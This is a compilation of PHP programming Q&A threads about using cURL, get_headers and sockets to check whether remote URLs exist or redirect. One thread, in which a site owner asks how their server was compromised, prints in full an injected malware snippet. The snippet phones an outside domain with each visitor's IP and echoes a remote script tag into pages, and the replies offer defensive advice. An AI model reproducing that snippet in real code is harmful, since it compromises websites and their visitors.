PHP Curl check for file existence before downloading - php

I am writing a PHP program that downloads a PDF from a backend and saves it to a local drive. How do I check whether the file exists before downloading it?
Currently I am using cURL (see code below) to check and download, but even when the PDF does not exist it still saves a file about 1 KB in size.
$url = "http://wedsite/test.pdf";
$path = "C:\\test.pdf";
downloadAndSave($url, $path);

function downloadAndSave($urlS, $pathS)
{
    $fp = fopen($pathS, 'w');
    $ch = curl_init($urlS);
    curl_setopt($ch, CURLOPT_FILE, $fp);
    $data = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    echo $httpCode;
    //If 404 is returned, then file is not found.
    if (strcmp($httpCode, "404") == 0)
    {
        echo $httpCode;
        echo $urlS;
    }
    fclose($fp);
}
I want to check whether the file exists before even downloading. Any idea how to do it?

You can do this with a separate curl HEAD request:
curl_setopt($ch, CURLOPT_NOBODY, true);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
When you actually want to download the file, set CURLOPT_NOBODY back to false.
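For the question's scenario, a minimal sketch of the full check-then-download flow could look like this (downloadIfExists() is just an illustrative name; the local file is only opened once the HEAD request has confirmed the resource exists):
<?php
function downloadIfExists($url, $path)
{
    // 1) HEAD request: no body is transferred, we only look at the status code
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_NOBODY, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($httpCode != 200) {
        return false; // not found (or other error): nothing is written to disk
    }

    // 2) Real download, now that we know the remote file is there
    $fp = fopen($path, 'w');
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_FILE, $fp);
    $ok = curl_exec($ch);
    curl_close($ch);
    fclose($fp);

    return $ok !== false;
}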

Call this before your download function and it's done:
<?php
function remoteFileExists($url) {
    $curl = curl_init($url);
    //don't fetch the actual page, you only want to check the connection is ok
    curl_setopt($curl, CURLOPT_NOBODY, true);
    //do request
    $result = curl_exec($curl);
    $ret = false;
    //if request did not fail
    if ($result !== false) {
        //if request was ok, check response code
        $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
        if ($statusCode == 200) {
            $ret = true;
        }
    }
    curl_close($curl);
    return $ret;
}
?>
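Usage sketch, assuming the $url and $path variables and the downloadAndSave() function from the question:
if (remoteFileExists($url)) {
    downloadAndSave($url, $path);
} else {
    echo "Remote file not found: $url";
}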

Since you are using HTTP to fetch a resource on the internet, what you really want to check is whether the HTTP return code is a 404.
On some PHP installations, you can just use file_exists($url) out of the box. This does not work in all environments, however. http://www.php.net/manual/en/wrappers.http.php
Here is a function much like file_exists but for URLs (despite its name, it uses get_headers() rather than cURL):
<?php
function curl_exists($url)
{
    $file_headers = @get_headers($url);
    if (!$file_headers || $file_headers[0] == 'HTTP/1.1 404 Not Found') {
        $exists = false;
    } else {
        $exists = true;
    }
    return $exists;
}
?>
source: http://www.php.net/manual/en/function.file-exists.php#75064
Sometimes the CURL extension isn't installed with PHP. In that case you can still use the socket library in the PHP core:
<?php
function url_exists($url) {
    $a_url = parse_url($url);
    if (!isset($a_url['port'])) $a_url['port'] = 80;
    $errno = 0;
    $errstr = '';
    $timeout = 30;
    if (isset($a_url['host']) && $a_url['host'] != gethostbyname($a_url['host'])) {
        $fid = fsockopen($a_url['host'], $a_url['port'], $errno, $errstr, $timeout);
        if (!$fid) return false;
        $page  = isset($a_url['path'])  ? $a_url['path'] : '';
        $page .= isset($a_url['query']) ? '?'.$a_url['query'] : '';
        fputs($fid, 'HEAD '.$page.' HTTP/1.0'."\r\n".'Host: '.$a_url['host']."\r\n\r\n");
        $head = fread($fid, 4096);
        $head = substr($head, 0, strpos($head, 'Connection: close'));
        fclose($fid);
        // accept a 200 or 302 response
        if (preg_match('#^HTTP/.*\s+(200|302)\s#i', $head)) {
            $pos = strpos($head, 'Content-Type');
            return $pos !== false;
        }
        return false;
    } else {
        return false;
    }
}
?>
source: http://www.php.net/manual/en/function.file-exists.php#73175
An even faster function can be found here:
http://www.php.net/manual/en/function.file-exists.php#76246

In the get_headers() example above, $file_headers[0] may contain something other than exactly 'HTTP/1.1 404 Not Found', e.g.:
HTTP/1.1 404 Document+%2Fdb%2Fscotbiz%2Freports%2FR20131212%2Exml+not+found
So it's important to use some other test, e.g. a regular expression, as '==' is not reliable.
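A sketch of a more tolerant check along those lines, extracting only the numeric status code from the first header line (remote_status_code() is a hypothetical helper name):
<?php
function remote_status_code($url)
{
    // get_headers() returns false on transport failure
    $headers = @get_headers($url);
    if (!$headers || !preg_match('#^HTTP/\S+\s+(\d{3})#', $headers[0], $m)) {
        return false;
    }
    return (int) $m[1];
}

$code = remote_status_code('http://example.com/test.pdf');
$exists = ($code !== false && $code != 404);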

Related

Malicious PHP code injected into a PHP file

Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that was injected into our files looked something like this:
#be7339#
if (empty($qjqb))
{
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
{
function __url_get_contents($remote_url, $timeout)
{
if(function_exists('curl_exec'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
}
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
{
$ctx = @stream_context_create(array('http' =>array('timeout' => $timeout,)));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents'))
{
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
{
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http")
{
$socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
} else
{
// Bad protocol
return FALSE;
}
if (!$socket)
{
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = @fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request))
{
// Error sending request
return FALSE;
}
$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain))
{
$_ip = $_SERVER['REMOTE_ADDR'];
$qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
$qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
if (strpos($qjqb, 'http://') === 0)
{
$__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
echo $__var_to_echo;
}
}
}
I would like to ask how this could have happened. And how to prevent this in the future.
Thanks in advance.
Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.
The most common way this happens is that you have a script that allows file uploads. If the script does not validate what file is uploaded, a malicious user can upload a PHP file.
If your upload folder allows PHP files to be parsed, the user could run that PHP file in the browser. It could be some sort of file explorer, which would then show the user all the files on your server. If any of those files have permissive enough permissions, the user could easily edit them to include the extra code you are seeing.
Usually it's because somebody else got access to your FTP or you allow uploading PHP files.
You should look into your other files too, because there could be other code that keeps adding those lines to your files (just a guess, based on the "#be7339#" marker at the beginning).
What Apache version is your server running? This problem can come from using an outdated version.
Look at this link about security vulnerabilities in old Apache 2.0 versions:
http://httpd.apache.org/security/vulnerabilities_20.html

Is there an alternative to file_get_contents?

Is there an alternative to file_get_contents? This is the code I'm having issues with:
if ( !$img = file_get_contents($imgurl) ) { $error[] = "Couldn't find the file named $card.$format at $defaultauto"; }
else {
if ( !file_put_contents($filename,$img) ) { $error[] = "Failed to upload $filename"; }
else { $success[] = "All missing cards have been uploaded"; }
}
I tried using cURL but couldn't quite figure out how to accomplish what this is accomplishing. Any help is appreciated!
There are many alternatives to file_get_contents; I've posted a couple of them below.
fopen
function fOpenRequest($url) {
$file = fopen($url, 'r');
$data = stream_get_contents($file);
fclose($file);
return $data;
}
$fopen = fOpenRequest('https://www.example.com');// This returns the data using fopen.
curl
function curlRequest($url) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($c);
curl_close($c);
return $data;
}
$curl = curlRequest('https://www.example.com');// This returns the data using curl.
You could use whichever of these options suits you, with the data stored in a variable, to perform whatever you need.
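Applied to the snippet in the question, a sketch using the curlRequest() helper above (the variables $imgurl, $filename, $card, $format, $defaultauto, $error and $success are assumed to be defined as in the question):
$img = curlRequest($imgurl);
if ($img === false || $img === '') {
    $error[] = "Couldn't find the file named $card.$format at $defaultauto";
} elseif (!file_put_contents($filename, $img)) {
    $error[] = "Failed to upload $filename";
} else {
    $success[] = "All missing cards have been uploaded";
}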

How do you access another PHP script in a PHP script?

I have a PHP page that needs to send data to another PHP page during the page execution and receive data back.
Can this be done? If so, how?
Update:
Sorry - meant to say that the second script is on a completely different server and domain.
Like how is Stripe doing it with their PHP option: https://stripe.com/docs/api?lang=php
EDIT
Looking at the Stripe source code, you will see they do use cURL (ApiRequestor.php):
private function _curlRequest($meth, $absUrl, $headers, $params, $myApiKey)
{
$curl = curl_init();
$meth = strtolower($meth);
$opts = array();
if ($meth == 'get') {
$opts[CURLOPT_HTTPGET] = 1;
if (count($params) > 0) {
$encoded = self::encode($params);
$absUrl = "$absUrl?$encoded";
}
} else if ($meth == 'post') {
$opts[CURLOPT_POST] = 1;
$opts[CURLOPT_POSTFIELDS] = self::encode($params);
} else if ($meth == 'delete') {
$opts[CURLOPT_CUSTOMREQUEST] = 'DELETE';
if (count($params) > 0) {
$encoded = self::encode($params);
$absUrl = "$absUrl?$encoded";
}
} else {
throw new Stripe_ApiError("Unrecognized method $meth");
}
$absUrl = self::utf8($absUrl);
$opts[CURLOPT_URL] = $absUrl;
$opts[CURLOPT_RETURNTRANSFER] = true;
$opts[CURLOPT_CONNECTTIMEOUT] = 30;
$opts[CURLOPT_TIMEOUT] = 80;
$opts[CURLOPT_RETURNTRANSFER] = true;
$opts[CURLOPT_HTTPHEADER] = $headers;
$opts[CURLOPT_USERPWD] = $myApiKey . ':';
$opts[CURLOPT_CAINFO] = dirname(__FILE__) . '/../data/ca-certificates.crt';
if (!Stripe::$verifySslCerts)
$opts[CURLOPT_SSL_VERIFYPEER] = false;
curl_setopt_array($curl, $opts);
$rbody = curl_exec($curl);
if ($rbody === false) {
$errno = curl_errno($curl);
$message = curl_error($curl);
curl_close($curl);
$this->handleCurlError($errno, $message);
}
$rcode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
return array($rbody, $rcode);
}
cURL - from the PHP manual:
PHP supports libcurl, a library created by Daniel Stenberg, that
allows you to connect and communicate to many different types of
servers with many different types of protocols. libcurl currently
supports the http, https, ftp, gopher, telnet, dict, file, and ldap
protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP
PUT, FTP uploading (this can also be done with PHP's ftp extension),
HTTP form based upload, proxies, cookies, and user+password
authentication.
<?php
/* http://localhost/upload.php:
print_r($_POST);
print_r($_FILES);
*/
$ch = curl_init();
$data = array('name' => 'Foo', 'file' => '@/home/user/test.png');
curl_setopt($ch, CURLOPT_URL, 'http://localhost/upload.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
?>
Use include('script2.php') from script1.php
Then you can call the functions within script2.php (assuming they have global scope) from script1.php.
The other possibility, if you want to call a PHP script the way an end user would (via a URL), is cURL, which is a good tool to know about.
http://php.net/manual/en/book.curl.php
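For the cross-server case, here is a minimal sketch of posting data to a remote script and reading its reply (the URL, field name and JSON response format are assumptions for illustration):
<?php
// script1.php -- sends data to a script on another server and reads the reply
$ch = curl_init('https://other-server.example.com/script2.php'); // hypothetical URL
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('user_id' => 42)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

// If script2.php replies with JSON, decode it to get the data back as an array
$data = json_decode($response, true);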

PHP: Check if URL redirects?

I have implemented a function that runs on each page that I want to restrict from non-logged-in users. The function automatically redirects the visitor to the login page if he or she is not logged in.
I would like to make a PHP function, run from an external server, that iterates through a number of set URLs (an array of URLs, one for each protected page) to see whether they are redirected or not. That way I could easily make sure the protection is up and running on every page.
How could this be done?
Thanks.
$urls = array(
    'http://www.apple.com/imac',
    'http://www.google.com/'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

foreach ($urls as $url) {
    curl_setopt($ch, CURLOPT_URL, $url);
    $out = curl_exec($ch);

    // line endings is the wonkiest piece of this whole thing
    $out = str_replace("\r", "", $out);

    // only look at the headers
    $headers_end = strpos($out, "\n\n");
    if ($headers_end !== false) {
        $out = substr($out, 0, $headers_end);
    }

    $headers = explode("\n", $out);
    foreach ($headers as $header) {
        if (substr($header, 0, 10) == "Location: ") {
            $target = substr($header, 10);
            echo "[$url] redirects to [$target]<br>";
            continue 2;
        }
    }

    echo "[$url] does not redirect<br>";
}
I use cURL and fetch only the headers; afterwards I compare my URL with the final URL reported by cURL:
$url="http://google.com";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, '60'); // in seconds
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(curl_getinfo($ch)['url'] == $url){
echo "not redirect";
}else {
echo "redirect";
}
You could always try adding:
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
since a 302 means the resource has moved; this allows the cURL call to follow it and return whatever the target URL returns.
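A sketch of how that can be combined with curl_getinfo() to tell whether a redirect actually happened (CURLINFO_REDIRECT_COUNT and CURLINFO_EFFECTIVE_URL are standard cURL info constants):
$ch = curl_init('http://google.com');
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);
// Number of redirects cURL followed; 0 means the URL did not redirect
$redirects = curl_getinfo($ch, CURLINFO_REDIRECT_COUNT);
$finalUrl  = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
curl_close($ch);
echo $redirects > 0 ? "redirects to $finalUrl" : "does not redirect";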
Getting the headers with get_headers() and checking if Location is set is much simpler.
$urls = [
"https://example-1.com",
"https://example-2.com"
];
foreach ($urls as $key => $url) {
$is_redirect = does_url_redirect($url) ? 'yes' : 'no';
echo $url . ' is redirected: ' . $is_redirect . PHP_EOL;
}
function does_url_redirect($url){
$headers = get_headers($url, 1);
if (!empty($headers['Location'])) {
return true;
} else {
return false;
}
}
I'm not sure whether this really makes sense as a security check.
If you are worried about files getting called directly without your "is the user logged in?" checks being run, you could do what many big PHP projects do: In the central include file (where the security check is being done) define a constant BOOTSTRAP_LOADED or whatever, and in every file, check for whether that constant is set.
Testing is great and security testing is even better, but I'm not sure what kind of flaw you are looking to uncover with this? To me, this idea feels like a waste of time that will not bring any real additional security.
Just make sure your script die()s after the header("Location: ...") redirect. That is essential to stop additional content from being output after the header call (a missing die() wouldn't be caught by your idea, by the way, as the redirect header would still be issued...).
If you really want to do this, you could also use a tool like wget and feed it a list of URLs. Have it fetch the results into a directory, and check (e.g. by looking at the file sizes that should be identical) whether every page contains the login dialog. Just to add another option...
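A minimal sketch of the constant-guard pattern mentioned above (the file names and constant name are just for illustration):
<?php
// bootstrap.php -- the central include where the "is the user logged in?" check runs
define('BOOTSTRAP_LOADED', true);

// protected-page.php -- every file that must not be called directly
if (!defined('BOOTSTRAP_LOADED')) {
    die('Direct access not permitted');
}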
Do you want to check the HTTP code to see if it's a redirect?
$params = array('http' => array(
'method' => 'HEAD',
'ignore_errors' => true
));
$context = stream_context_create($params);
foreach(array('http://google.com', 'http://stackoverflow.com') as $url) {
$fp = fopen($url, 'rb', false, $context);
$result = stream_get_contents($fp);
if ($result === false) {
throw new Exception("Could not read data from {$url}");
} else if (! strstr($http_response_header[0], '301')) {
// Do something here
}
}
I hope it will help you:
function checkRedirect($url)
{
$headers = get_headers($url);
if ($headers) {
if (isset($headers[0])) {
if ($headers[0] == 'HTTP/1.1 302 Found') {
//this is the URL where it's redirecting
return str_replace("Location: ", "", $headers[9]);
}
}
}
return false;
}
$isRedirect = checkRedirect($url);
if(!$isRedirect )
{
echo "URL Not Redirected";
}else{
echo "URL Redirected to: ".$isRedirect;
}
You can use a session: if the session array is not set, redirect the user to the login page.
I modified Adam Backstrom's answer and implemented chiborg's suggestion (fetch only the HEAD). It does one thing more: it checks whether the redirect points to a page on the same server or somewhere else. Example: terra.com.br redirects to terra.com.br/portal; PHP considers that a redirect, which is correct, but I only wanted to list URLs that redirect to a different host.
function RedirectURL() {
$urls = array('http://www.terra.com.br/','http://www.areiaebrita.com.br/');
foreach ($urls as $url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// chiborg suggestion
curl_setopt($ch, CURLOPT_NOBODY, true);
// ================================
// READ URL
// ================================
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
echo $out;
$headers = explode("\n", $out);
foreach($headers as $header) {
if(substr(strtolower($header), 0, 9) == "location:") {
// read URL to check if redirect to somepage on the server or another one.
// terra.com.br redirect to terra.com.br/portal. it is valid.
// but areiaebrita.com.br redirect to bwnet.com.br, and this is invalid.
// what we want is to check if the address continues being terra.com.br or changes. if changes, prints on page.
// if contains http, we will check if changes url or not.
// some servers, to redirect to a folder available on it, redirect only citting the folder. Example: net11.com.br redirect only to /heiden
// only execute if have http on location
if ( strpos(strtolower($header), "http") !== false) {
$address = explode("/", $header);
print_r($address);
// $address['0'] = http
// $address['1'] =
// $address['2'] = www.terra.com.br
// $address['3'] = portal
echo "url (address from array) = " . $url . "<br>";
echo "address[2] = " . $address['2'] . "<br><br>";
// url: terra.com.br
// address['2'] = www.terra.com.br
// check if string terra.com.br is still available in www.terra.com.br. It indicates that server did not redirect to some page away from here.
if(strpos(strtolower($address['2']), strtolower($url)) !== false) {
echo "URL NOT REDIRECT";
} else {
// not the same. (areiaebrita)
echo "SORRY, URL REDIRECT WAS FOUND: " . $url;
}
}
}
}
}
}
function unshorten_url($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
$real_url = $url;//default.. (if no redirect)
if (preg_match("/location: (.*)/i", $out, $redirect))
$real_url = $redirect[1];
if (strstr($real_url, "bit.ly"))//the redirect is another shortened url
$real_url = unshorten_url($real_url);
return $real_url;
}
I have just made a function that checks if a URL exists or not
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
function url_exists($url, $ch) {
    curl_setopt($ch, CURLOPT_URL, $url);
    $out = curl_exec($ch);

    // line endings is the wonkiest piece of this whole thing
    $out = str_replace("\r", "", $out);

    // only look at the headers
    $headers_end = strpos($out, "\n\n");
    if ($headers_end !== false) {
        $out = substr($out, 0, $headers_end);
    }

    $headers = explode("\n", $out);
    foreach ($headers as $header) {
        if (strpos($header, 'HTTP/1.1 200 OK') !== false) {
            return true;
        }
    }
    return false;
}
Now I have used an array of URLs to check if a URL exists as following:
$my_url_array = array('http://howtocode.pk/result', 'http://google.com/jobssss', 'https://howtocode.pk/javascript-tutorial/', 'https://www.google.com/');
for($j = 0; $j < count($my_url_array); $j++){
if(url_exists($my_url_array[$j], $ch)){
echo 'This URL "'.$my_url_array[$j].'" exists. <br>';
}
}
I can't understand your question.
You have an array of URLs and you want to know whether the user came from one of the listed URLs?
If I'm understanding your question correctly:
$urls = array('http://url1.com','http://url2.ru','http://url3.org');
if(in_array($_SERVER['HTTP_REFERER'],$urls))
{
echo 'FROM ARRAY';
} else {
echo 'NOT FROM ARR';
}

What is the fastest way to determine if a URL exists in PHP?

I need to create a function that returns if a URL is reachable or valid.
I am currently using something like the following to determine a valid url:
static public function urlExists($url)
{
    $fp = @fopen($url, 'r');
    if ($fp)
    {
        return true;
    }
    return false;
}
It seems like there would be something faster, maybe something that just fetched the page header or something.
You can use curl as follows:
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_NOBODY, true); // set to HEAD request
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // don't output the response
curl_exec($ch);
$valid = curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200;
curl_close($ch);
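Wrapped into a plain-function sketch with the same shape as the method in the question (the timeout values are illustrative):
function urlExists($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_NOBODY, true);          // HEAD request only
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  // don't output the response
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);     // illustrative timeouts
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);
    curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return $code >= 200 && $code < 400;              // treat 2xx/3xx as "exists"
}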
You could check the HTTP status code.
Here is some code you could use to check that a URL returns a 2xx or 3xx HTTP code, to ensure the URL works.
<?php
$url = "http://stackoverflow.com/questions/1122845";

function urlOK($url)
{
    $url_data = parse_url($url);
    if (!$url_data) return FALSE;

    $errno = "";
    $errstr = "";
    $fp = fsockopen($url_data['host'], 80, $errno, $errstr, 30);
    if ($fp === false) return FALSE;

    $path = '/';
    if (isset($url_data['path']))  $path  = $url_data['path'];
    if (isset($url_data['query'])) $path .= '?' . $url_data['query'];

    $out  = "GET $path HTTP/1.1\r\n";
    $out .= "Host: {$url_data['host']}\r\n";
    $out .= "Connection: Close\r\n\r\n";

    fwrite($fp, $out);
    $content = fgets($fp);
    $code = trim(substr($content, 9, 4)); //get http code
    fclose($fp);

    // if http code is 2xx or 3xx url should work
    return ($code[0] == 2 || $code[0] == 3) ? TRUE : FALSE;
}

echo $url;

if (urlOK($url)) echo " is a working URL";
else echo " is a bad URL";
?>
Hope this helps!
You'll likely be limited to sending some kind of HTTP request. Then you can check HTTP status codes.
Be sure to send only a "HEAD" request, which doesn't pull back all the content. That ought to be sufficient and lightweight enough.
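A sketch of a HEAD-only check without cURL, using a stream context ($http_response_header is populated automatically by PHP's http:// wrapper):
<?php
$context = stream_context_create(array('http' => array('method' => 'HEAD', 'ignore_errors' => true)));
$body = @file_get_contents('http://example.com/', false, $context);
// $http_response_header[0] looks like "HTTP/1.1 200 OK"
$status = isset($http_response_header[0]) ? $http_response_header[0] : '';
echo preg_match('#^HTTP/\S+\s+[23]\d\d#', $status) ? 'reachable' : 'not reachable';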
